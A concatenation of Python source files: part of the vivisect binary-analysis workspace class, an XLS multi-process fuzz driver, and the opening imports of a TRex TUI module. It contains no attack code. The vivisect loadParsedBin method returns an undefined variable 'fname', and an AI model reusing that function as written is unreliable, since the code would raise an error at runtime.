return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
"""
Create a number location in memory of the given size.
(you may specify val if you have already parsed the value
from memory and would like to save CPU cycles)
"""
return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
'''
Parse a <size> width numeric value from memory at <va>.
Example:
val = vw.parseNumber(0x41414140, 4)
'''
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
# rip through the desired memory range to populate any substrings
subs = set()
end = va + size
for offs in range(va, end, 1):
loc = self.getLocation(offs, range=True)
if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va:
subs.add((loc[L_VA], loc[L_SIZE]))
if loc[L_TINFO]:
subs = subs.union(set(loc[L_TINFO]))
return list(subs)
def _getStrTinfo(self, va, size, subs):
ploc = self.getLocation(va, range=False)
if ploc:
# the string we're making is a substring of some outer one
# still make this string location, but let the parent know about us too and our
# children as well. Ultimately, the outermost parent should be responsible for
# knowing about all it's substrings
modified = False
pva, psize, ptype, pinfo = ploc
if ptype not in (LOC_STRING, LOC_UNI):
return va, size, subs
if (va, size) not in pinfo:
modified = True
pinfo.append((va, size))
for sva, ssize in subs:
if (sva, ssize) not in pinfo:
modified = True
pinfo.append((sva, ssize))
tinfo = pinfo
if modified:
va = pva
size = psize
else:
tinfo = subs
return va, size, tinfo
def makeString(self, va, size=None):
"""
Create a new string location at the given VA. You may optionally
specify size. If size==None, the string will be parsed as a NULL
terminated ASCII string.
Substrings are also handled here. Generally, the idea is:
* if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0)
* if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
address 0x44, we won't actually make a new location for the string B, but rather add info to the
tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
getLocation
* if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
that has a size of 16 or more, we overwrite the string A with the location information for string B,
and demote string A to being a tuple of (VA, size) inside of string B's location information.
This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
capture true substrings that aren't merely suffixes.
This same formula is applied to unicode detection as well
"""
if size is None:
size = self.asciiStringSize(va)
if size <= 0:
raise Exception("Invalid String Size: %d" % size)
# rip through the desired memory range to populate any substrings
subs = self._getSubstrings(va, size, LOC_STRING)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'')
self.makeName(va, "str_%s_%.8x" % (m[:16].decode('utf-8'), va))
return self.addLocation(pva, psize, LOC_STRING, tinfo=tinfo)
def makeUnicode(self, va, size=None):
if size is None:
size = self.uniStringSize(va)
if size <= 0:
raise Exception("Invalid Unicode Size: %d" % size)
subs = self._getSubstrings(va, size, LOC_UNI)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'').replace(b'\0', b'')
try:
self.makeName(va, "wstr_%s_%.8x" % (m[:16].decode('utf-8'), va))
except:
self.makeName(va, "wstr_%s_%.8x" % (m[:16],va))
return self.addLocation(pva, psize, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
'''
Add constants declared within the named module
to the constants resolver namespace.
Example: vw.addConstModule('vstruct.constants.ntstatus')
'''
mod = self.loadModule(modname)
self.vsconsts.addModule(mod)
def addStructureModule(self, namespace, modname):
'''
Add a vstruct structure module to the workspace with the given
namespace.
Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')
This allows subsequent struct lookups by names like
'''
mod = self.loadModule(modname)
self.vsbuilder.addVStructNamespace(namespace, mod)
def getStructure(self, va, vstructname):
"""
Parse and return a vstruct object for the given name. This
(like parseOpcode) does *not* require that the location be a struct
and will not create one (use makeStructure).
"""
s = vstruct.getStructure(vstructname)
if s is None:
s = self.vsbuilder.buildVStruct(vstructname)
if s is not None:
bytes = self.readMemory(va, len(s))
s.vsParse(bytes)
return s
def makeStructure(self, va, vstructname, vs=None):
"""
Make a location which is a structure and will be parsed/accessed
by vstruct. You must specify the vstruct name for the structure
you wish to have at the location. Returns a vstruct from the
location.
"""
if vs is None:
vs = self.getStructure(va, vstructname)
self.addLocation(va, len(vs), LOC_STRUCT, vstructname)
# Determine if there are any pointers we need make
# xrefs for...
offset = 0
for p in vs.vsGetPrims():
if isinstance(p, vs_prims.v_ptr):
vptr = p.vsGetValue()
if self.isValidPointer(vptr):
self.addXref(va+offset, vptr, REF_PTR)
offset += len(p)
return vs
def getUserStructNames(self):
'''
Retrive the list of the existing user-defined structure
names.
Example:
for name in vw.getUserStructNames():
print('Structure Name: %s' % name)
'''
return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
'''
Get the source code (as a string) for the given user
defined structure.
Example:
ssrc = vw.getUserStructSource('MyStructureThing')
'''
return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
'''
Save the input string as a C structure definition for the
workspace. User-defined structures may then be applied
to locations, or further edited in the future.
Example:
src = "struct woot { int x; int y; };"
vw.setUserStructSource( src )
'''
# First, we make sure it compiles...
ctor = vs_cparse.ctorFromCSource( ssrc )
# Then, build one to get the name from it...
vs = ctor()
cname = vs.vsGetTypeName()
self.setMeta('ustruct:%s' % cname, ssrc)
return cname
def asciiStringSize(self, va):
"""
Return the size (in bytes) of the ascii string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 1
def uniStringSize(self, va):
"""
Return the size (in bytes) of the unicode string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
"""
Add a location tuple.
"""
ltup = (va, size, ltype, tinfo)
#loc = self.locmap.getMapLookup(va)
#if loc is not None:
#raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup))
self._fireEvent(VWE_ADDLOCATION, ltup)
return ltup
def getLocations(self, ltype=None, linfo=None):
"""
Return a list of location objects from the workspace
of a particular type.
"""
if ltype is None:
return list(self.loclist)
if linfo is None:
return [ loc for loc in self.loclist if loc[2] == ltype ]
return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ]
def isLocation(self, va, range=False):
"""
Return True if the va represents a location already.
"""
if self.getLocation(va, range=range) is not None:
return True
return False
def isLocType(self, va, ltype):
"""
You may use this to test if a given VA represents
a location of the specified type.
example:
if vw.isLocType(0x41414141, LOC_STRING):
print("string at: 0x41414141")
"""
# make it operate like py2 did
if va is None:
return False
tup = self.getLocation(va)
if tup is None:
return False
return tup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
"""
Return the va,size,ltype,tinfo tuple for the given location.
(specify range=True to potentially match a va that is inside
a location rather than the beginning of one, this behavior
only affects strings/substring retrieval currently)
"""
loc = self.locmap.getMapLookup(va)
if not loc:
return loc
if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
# dig into any sublocations that may have been created, trying to find the best match
# possible, where "best" means the substring that both contains the va, and has no substrings
# that contain the va.
if not loc[L_TINFO]:
return loc
subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
ltup = loc
for sva, ssize in subs:
if sva <= va < sva + ssize:
ltup = (sva, ssize, loc[L_LTYPE], [])
return ltup
else:
return loc
def getLocationRange(self, va, size):
"""
A "location range" is a list of location tuples where
undefined space *will* be represented by LOC_UNDEF tuples
to provide a complete accounting of linear workspace.
"""
ret = []
endva = va+size
undefva = None
while va < endva:
ltup = self.getLocation(va)
if ltup is None:
if undefva is None:
undefva = va
va += 1
else:
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
undefva = None
ret.append(ltup)
va += ltup[L_SIZE]
# Mop up any hanging udefs
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
return ret
def delLocation(self, va):
"""
Delete the given Location object from the binary
(removes any xrefs/etc for the location as well)
This will raise InvalidLocation if the va is not
an exact match for the beginning of a location.
"""
loc = self.getLocation(va)
if loc is None:
raise InvalidLocation(va)
# remove xrefs from this location
for xref in self.getXrefsFrom(va):
self.delXref(xref)
self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
"""
Get nearly everything needed to render a workspace area
to a display. This function *greatly* speeds up interface
code and is considered "tightly coupled" with the asmview
code. (and is therefore subject to change).
"""
locs = []
funcs = {}
names = {}
comments = {}
extras = {}
for loc in self.getLocationRange(va, size):
lva, lsize, ltype, tinfo = loc
locs.append(loc)
name = self.getName(lva)
isfunc = self.isFunction(lva)
cmnt = self.getComment(lva)
if name is not None:
names[lva] = name
if isfunc == True:
funcs[lva] = True
if cmnt is not None:
comments[lva] = cmnt
if ltype == LOC_UNDEF:
# Expand out all undefs so we can send all the info
endva = lva + lsize
while lva < endva:
uname = self.getName(lva)
ucmnt = self.getComment(lva)
if uname is not None:
names[lva] = uname
if ucmnt is not None:
comments[lva] = ucmnt
#ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
lva += 1
elif ltype == LOC_OP:
extras[lva] = self.parseOpcode(lva)
elif ltype == LOC_STRUCT:
extras[lva] = self.getStructure(lva, tinfo)
return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
"""
Get the previous location behind this one. If adjacent
is true, only return a location which is IMMEDIATELY behind
the given va, otherwise search backward for a location until
you find one or hit the edge of the segment.
"""
va -= 1
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
if adjacent:
return None
va -= 1
while va > 0:
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
va -= 1
return None
def vaByName(self, name):
return self.va_by_name.get(name, None)
def getLocationByName(self, name):
"""
Return a location object by the name of the
location.
"""
va = self.vaByName(name)
if va is None:
raise InvalidLocation(0, "Unknown Name: %s" % name)
return self.getLocation(va)
def getNames(self):
"""
Return a list of tuples containing (va, name)
"""
return list(self.name_by_va.items())
def getName(self, va, smart=False):
'''
Returns the name of the specified virtual address (or None).
Smart mode digs beyond simple name lookups, as follows:
If va falls within a known function in the workspace, we return "funcname+<delta>".
If not, and the va falls within a mapped binary, we return "filename+<delta>"
'''
name = self.name_by_va.get(va)
if name is not None or not smart:
return name
# TODO: by previous symbol?
# by function
baseva = self.getFunction(va)
basename = self.name_by_va.get(baseva, None)
if self.isFunction(va):
basename = 'sub_0%x' % va
# by filename
if basename is None:
basename = self.getFileByVa(va)
if basename is None:
return None
baseva = self.getFileMeta(basename, 'imagebase')
delta = va - baseva
if delta:
pom = ('', '+')[delta>0]
name = "%s%s%s" % (basename, pom, hex(delta))
else:
name = basename
return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
"""
Set a readable name for the given location by va. There
*must* be a Location defined for the VA before you may name
it. You may set a location's name to None to remove a name.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
default behavior is to fail on duplicate (False).
"""
if filelocal:
segtup = self.getSegment(va)
if segtup is None:
self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
if segtup is not None:
fname = segtup[SEG_FNAME]
if fname is not None:
name = "%s.%s" % (fname, name)
oldva = self.vaByName(name)
# If that's already the name, ignore the event
if oldva == va:
return
if oldva is not None:
if not makeuniq:
raise DuplicateName(oldva, va, name)
else:
logger.debug('makeName: %r already lives at 0x%x', name, oldva)
# tack a number on the end
index = 0
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
while self.vaByName(newname) not in (None, newname):
# if we run into the va we're naming, that's the name still
if newoldva == va:
return newname
logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
index += 1
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
name = newname
self._fireEvent(VWE_SETNAME, (va,name))
return name
def saveWorkspace(self, fullsave=True):
if self.server is not None:
return
modname = self.getMeta("StorageModule")
filename = self.getMeta("StorageName")
if modname is None:
raise Exception("StorageModule not specified!")
if filename is None:
raise Exception("StorageName not specified!")
# Usually this is "vivisect.storage.basicfile
mod = self.loadModule(modname)
# If they specified a full save, *or* this event list
# has never been saved before, do a full save.
if fullsave:
mod.saveWorkspace(self, filename)
else:
mod.saveWorkspaceChanges(self, filename)
self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file descriptor and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
Returns the file md5
"""
mod = None
fd.seek(0)
if fmtname is None:
bytes = fd.read(32)
fmtname = viv_parsers.guessFormat(bytes)
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
fd.seek(0)
filename = hashlib.md5(fd.read()).hexdigest()
fname = mod.parseFd(self, fd, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadParsedBin(self, pbin, fmtname=None, baseaddr=None):
'''
Load an already parsed PE or Elf file into the workspace. Raises an exception if
the file isn't one of those two.
Returns the file md5
'''
fd = pbin.fd
fd.seek(0)
if fmtname is None:
byts = fd.read(32)
fmtname = viv_parsers.guessFormat(byts)
filename = hashlib.md5(fd.read()).hexdigest()
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
if fmtname == 'pe':
mod.loadPeIntoWorkspace(self, pbin)
elif fmtname == 'elf':
mod.loadElfIntoWorkspace(self, pbin)
else:
raise Exception('Failed to load in the parsed module for format %s', fmtname)
self.initMeta("StorageName", filename+".viv")
self._snapInAnalysisModules()
return fname
def _saveSymbolCaches(self):
if not self.config.vdb.SymbolCacheActive:
return
pathstr = self.config.vdb.SymbolCachePath
symcache = e_symcache.SymbolCachePath(pathstr)
symsbyfile = collections.defaultdict(list)
# Get the image base addresses
imgbases = {}
for fname in self.getFiles():
imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
for va,name in self.name_by_va.items():
mmap = self.getMemoryMap(va)
if mmap is None:
continue
symva = va - imgbases.get(mmap[3], va)
if symva:
symtype = e_resolv.SYMSTOR_SYM_SYMBOL
if self.isFunction(va):
symtype = e_resolv.SYMSTOR_SYM_FUNCTION
symsbyfile[mmap[3]].append((symva, 0, name, symtype))
for filenorm, symtups in symsbyfile.items():
symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
if symhash is None:
continue
self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
( if it's a workspace, trigger loadWorkspace() as a convenience )
Returns the basename the file was given on load.
"""
mod = None
if fmtname is None:
fmtname = viv_parsers.guessFormatFilename(filename)
if fmtname in STORAGE_MAP:
self.setMeta('StorageModule', STORAGE_MAP[fmtname])
self.loadWorkspace(filename)
return self.normFileName(filename)
mod = viv_parsers.getParserModule(fmtname)
fname = mod.parseFile(self, filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
"""
Load a memory map (or potentially a mapped binary file)
from the memory object's map at baseaddr.
"""
mod = None
if fmtname is None:
bytez = memobj.readMemory(baseaddr, 32)
fmtname = viv_parsers.guessFormat(bytez)
# TODO: Load workspace from memory?
mod = viv_parsers.getParserModule(fmtname)
mod.parseMemory(self, memobj, baseaddr)
mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
if not mapfname:
mapfname = 'mem_map_%.8x' % mapva
self.initMeta('StorageName', mapfname+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
def getFiles(self):
"""
Return the current list of file objects in this
workspace.
"""
return list(self.filemeta.keys())
def normFileName(self, filename):
normname = os.path.basename(filename).lower()
# Strip off an extension
if normname.find('.') != -1:
parts = normname.split('.')
normname = '_'.join(parts[:-1])
ok = string.ascii_letters + string.digits + '_'
chars = list(normname)
for i in range(len(chars)):
if chars[i] not in ok:
chars[i] = '_'
normname = ''.join(chars)
#if normname[0].isdigit():
#normname = '_' + normname
return normname
def addFile(self, filename, imagebase, md5sum):
"""
Create and add a new vivisect File object for the
specified information. This will return the file
object which you may then use to do things like
add imports/exports/segments etc...
"""
nname = self.normFileName(filename)
if nname in self.filemeta:
raise Exception("Duplicate File Name: %s" % nname)
self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
return nname
def addEntryPoint(self, va):
'''
Add an entry point to the definition for the given file. This
will hint the analysis system to create functions when analysis
is run.
NOTE: No analysis is triggered by this function.
'''
self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
'''
Get all the parsed entry points for all the files loaded into the
workspace.
Example: for va in vw.getEntryPoints():
'''
return [ x for x, in self.getVaSetRows('EntryPoints') ]
def setFileMeta(self, fname, key, value):
"""
Store a piece of file specific metadata (python primatives are best for values)
"""
if fname not in self.filemeta:
raise Exception("Invalid File: %s" % fname)
self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
"""
Retrieve a piece of file specific metadata
"""
d = self.filemeta.get(filename)
if d is None:
raise Exception("Invalid File: %s" % filename)
return d.get(key, default)
def getFileMetaDict(self, filename):
'''
Retrieve the file metadata for this file as a key:val dict.
'''
d = self.filemeta.get(filename)
if d is None:
raise Exception('Invalid File: %s' % filename)
return d
def getFileByVa(self, va):
segtup = self.getSegment(va)
if segtup is None:
return None
return segtup[SEG_FNAME]
def getLocationDistribution(self):
# NOTE: if this changes, don't forget the report module!
totsize = 0
for mapva, mapsize, mperm, mname in self.getMemoryMaps():
totsize += mapsize
loctot = 0
ret = {}
for i in range(LOC_MAX):
cnt = 0
size = 0
for lva,lsize,ltype,tinfo in self.getLocations(i):
cnt += 1
size += lsize
loctot += size
tname = loc_type_names.get(i, 'Unknown')
ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
# Update the undefined based on totals...
undeftot = totsize-loctot
ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
return ret
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
"""
Get a list of the names of the current VA lists.
"""
return list(self.vasets.keys())
def getVaSetDef(self, name):
"""
Get the list of (name, type) pairs which make up the
rows for this given VA set (the first one *always* the VA, but
you can name it as you like...)
"""
x = self.vasetdefs.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def getVaSetRows(self, name):
"""
Get a list of the rows in this VA set.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
# yes, this is weird. but it's how python2 returns values()
return list(x.values())
def getVaSet(self, name):
"""
Get the dictionary of va:<rowdata> entries.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def addVaSet(self, name, defs, rows=()):
"""
Add a va set:
name - The name for this VA set
defs - List of (<name>,<type>) tuples for the rows (va is always first)
rows - An initial set of rows for values in this set.
"""
self._fireEvent(VWE_ADDVASET, (name, defs, rows))
def delVaSet(self, name):
"""
Delete a VA set by name.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
"""
Use this API to update the row data for a particular
entry in the VA set.
"""
self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
'''
Retrieve the va set row for va in the va set named name.
Example:
row = vw.getVaSetRow('WootFunctions', fva)
'''
vaset = self.vasets.get( name )
if vaset is None:
return None
return vaset.get( va )
def delVaSetRow(self, name, va):
"""
Use this API to delete the rowdata associated
with the specified VA from the set.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
uname = e_config.getusername()
# FIXME this should be part of a UI event model.
self._fireEvent(VWE_CHAT, (uname, msg))
def iAmLeader(self, winname):
'''
Announce that your workspace is leading a window with the
specified name. This allows others to opt-in to following
the nav events for the given window name.
Example:
vw.iAmLeader('WindowTitle')
'''
if not self.server:
raise Exception('iAmLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname))
def followTheLeader(self, winname, expr):
'''
Announce a new memory expression to navigate to if if a given window
is following the specified user/winname
Example:
vw.followTheLeader('FunExample', 'sub_08042323')
'''
if not self.server:
raise Exception('followTheLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
"""
Return a list of the names of the given color maps
"""
return list(self.colormaps.keys())
def addColorMap(self, mapname, colormap):
"""
Add a colormap dictionary with the given name for the map.
(A colormap dictionary is va:color entries)
"""
self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
"""
Return the colormap dictionary for the given map name.
"""
return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart])
else:
name = fpart + '.' + joinstr.join([prefix, npart]) + '_%s' % vapart
return name
##########################################################
#
# The envi.symstore.resolver.SymbolResolver API...
#
def getSymByName(self, name):
# Check for a sym
va = self.vaByName(name)
if va is not None:
return e_resolv.Symbol(name, va, 0)
# check for the need for a deref.
d = self.filemeta.get(name)
if d is not None:
return VivFileSymbol(self, name, d.get("imagebase"), 0, self.psize)
def getSymByAddr(self, addr, exact=True):
name = self.getName(addr)
if name is None:
if self.isValidPointer(addr):
name = "loc_%.8x" % addr
if name is not None:
#FIXME fname
#FIXME functions/segments/etc...
return e_resolv.Symbol(name, addr, 0)
def setSymHint(self, va, idx, hint):
'''
Set a symbol hint which will be used in place of operand
values during disassembly among other things...
You may also set hint=None to delete sym hints.
'''
self._fireEvent(VWE_SYMHINT, (va, idx, hint))
def getSymHint(self, va, idx):
h = self.getFref(va, idx)
if h is not None:
f = self.getFunction(va)
loctup = self.getFunctionLocal(f, h)
if loctup:
return loctup[1]
return self.symhints.get((va, idx), None)
class VivFileSymbol(e_resolv.FileSymbol):
# A namespace tracker thingie...
def __init__(self, vw, fname, base, size, width=4):
self.vw = vw
e_resolv.FileSymbol.__init__(self, fname, base, size, width)
def getSymByName(self, name):
return self.vw.getSymByName("%s.%s" % (self.name, name))
def getVivPath(*pathents):
dname = os.path.dirname(__file__)
dname = os.path.abspath(dname)
return os.path.join(dname, *pathents)
##############################################################################
# The following are touched during the release process by bump2version.
# You should have no reason to modify these directly
version = (1, 0, 3)
verstring = '.'.join([str(x) for x in version])
commit = ''
|
run_fuzz_multiprocess_main.py | # Lint as: python3
#
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-process fuzz driver program.
Collects crash samples into a directory of the user's choosing.
"""
import datetime
import multiprocessing as mp
import os
import random
import sys
from absl import app
from absl import flags
import psutil
from xls.common import gfile
from xls.common import multiprocess
from xls.fuzzer import cli_helpers
from xls.fuzzer import run_fuzz_multiprocess
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
flags.DEFINE_integer('seed', 0, 'Seed value for generation')
flags.DEFINE_integer('sample_count', 1024, 'Number of samples to generate')
flags.DEFINE_string('duration', None,
'Duration to run the sample generator for')
flags.DEFINE_integer('calls_per_sample', 128,
'Arguments to generate per sample')
flags.DEFINE_string('crash_path', None, 'Path at which to place crash data')
flags.DEFINE_string(
'save_temps_path', None, 'Path of directory in which to save temporary '
'files. These temporary files include DSLX, IR, and arguments. A '
'separate numerically-named subdirectory is created for each sample')
flags.DEFINE_integer(
'worker_count', None, 'Number of workers to use for execution; defaults '
'to number of physical cores detected')
flags.DEFINE_boolean('disallow_divide', True,
'Exclude generation of divide operator')
flags.DEFINE_boolean('emit_loops', True, 'Emit loops in generator')
flags.DEFINE_boolean(
'use_llvm_jit', True, 'Use LLVM JIT to evaluate IR. The interpreter is '
'still invoked at least once on the IR even with this option enabled, but '
'this option can be used to disable the JIT entirely.')
flags.DEFINE_boolean('codegen', False, 'Run code generation')
flags.DEFINE_boolean('simulate', False, 'Run Verilog simulation.')
flags.DEFINE_string('simulator', None,
'Verilog simulator to use. For example: "iverilog".')
flags.DEFINE_boolean('execute', True, 'Execute IR (vs simply code generation)')
flags.DEFINE_boolean(
'minimize_ir', True,
'If a crasher is found, attempt to reduce the IR to find a minimal '
'reproducer.')
flags.DEFINE_boolean('print_samples', False,
'Print generated samples (to stdout)')
flags.DEFINE_boolean(
'short_samples', False,
'Generate samples with small number of nested expressions')
flags.DEFINE_string(
'summary_path', None,
'Directory in which to write the sample summary information. This records '
'information about each generated sample including which XLS op types and '
'widths. Information is written in Protobuf format with one file per '
'worker. Files are appended to by the worker.')
flags.DEFINE_integer(
'max_width_bits_types', 64,
'The maximum width of bits types in the generated samples.')
flags.DEFINE_integer(
'max_width_aggregate_types', 1024,
'The maximum width of aggregate types (tuples and arrays) in the generated '
'samples.')
flags.DEFINE_boolean(
'use_system_verilog', True,
'If true, emit SystemVerilog during codegen otherwise emit Verilog.')
flags.DEFINE_integer(
'timeout_seconds', 300,
'The timeout value in seconds for each subcommand invocation.')
FLAGS = flags.FLAGS
QUEUE_MAX_BACKLOG = 16
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.simulate and not FLAGS.codegen:
raise app.UsageError('Must specify --codegen when --simulate is given.')
# Test that we can write to the crash and summary path.
for path in (FLAGS.crash_path, FLAGS.summary_path):
if path:
gfile.make_dirs(path)
with gfile.open(os.path.join(path, 'test'), 'w') as f:
print('test', file=f)
start = datetime.datetime.now()
physical_core_count = psutil.cpu_count(logical=False)
worker_count = FLAGS.worker_count or physical_core_count
worker_count = max(worker_count, 1) # Need at least one worker.
queues = (multiprocess.get_user_data() or
[mp.Queue() for _ in range(worker_count)])
queues = queues[:worker_count]
print('-- Creating pool of {} workers; physical core count {}'.format(
worker_count, physical_core_count))
workers = []
for i in range(worker_count):
queue = None if multiprocess.has_user_data_support() else queues[i]
target = run_fuzz_multiprocess.do_worker_task
args = (i, queue, FLAGS.crash_path, FLAGS.summary_path,
FLAGS.save_temps_path, FLAGS.minimize_ir)
worker = multiprocess.Process(target=target, args=args)
worker.start()
workers.append(worker)
duration_str = FLAGS.duration
duration = None if duration_str is None else cli_helpers.parse_duration(
duration_str)
seed = FLAGS.seed
if not seed:
seed = random.randrange(0, 1 << 31)
print('-- Using randomly generated seed:', seed)
sys.stdout.flush()
generator_options = ast_generator.AstGeneratorOptions(
disallow_divide=FLAGS.disallow_divide,
emit_loops=FLAGS.emit_loops,
short_samples=FLAGS.short_samples,
max_width_bits_types=FLAGS.max_width_bits_types,
max_width_aggregate_types=FLAGS.max_width_aggregate_types,
emit_gate=not FLAGS.codegen)
default_sample_options = sample.SampleOptions(
convert_to_ir=True,
optimize_ir=True,
use_jit=FLAGS.use_llvm_jit,
codegen=FLAGS.codegen,
simulate=FLAGS.simulate,
simulator=FLAGS.simulator,
use_system_verilog=FLAGS.use_system_verilog,
timeout_seconds=FLAGS.timeout_seconds)
sample_count = run_fuzz_multiprocess.do_generator_task(
queues,
seed,
generator_options,
FLAGS.sample_count,
FLAGS.calls_per_sample,
default_sample_options=default_sample_options,
duration=duration,
print_samples=FLAGS.print_samples)
for i, worker in enumerate(workers):
print('-- Joining on worker {}'.format(i))
worker.join()
delta = datetime.datetime.now() - start
elapsed = delta.total_seconds()
print(
'-- Elapsed end-to-end: {} = {:.2f} seconds; {:,} samples; {:.2f} samples/s'
.format(delta, elapsed, sample_count, sample_count / elapsed))
if __name__ == '__main__':
def real_main(): # Avoid defining things in global scope.
flags.mark_flag_as_required('crash_path')
queues = tuple(mp.Queue(QUEUE_MAX_BACKLOG) for _ in range(128))
multiprocess.run_main(main, queues)
real_main()
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
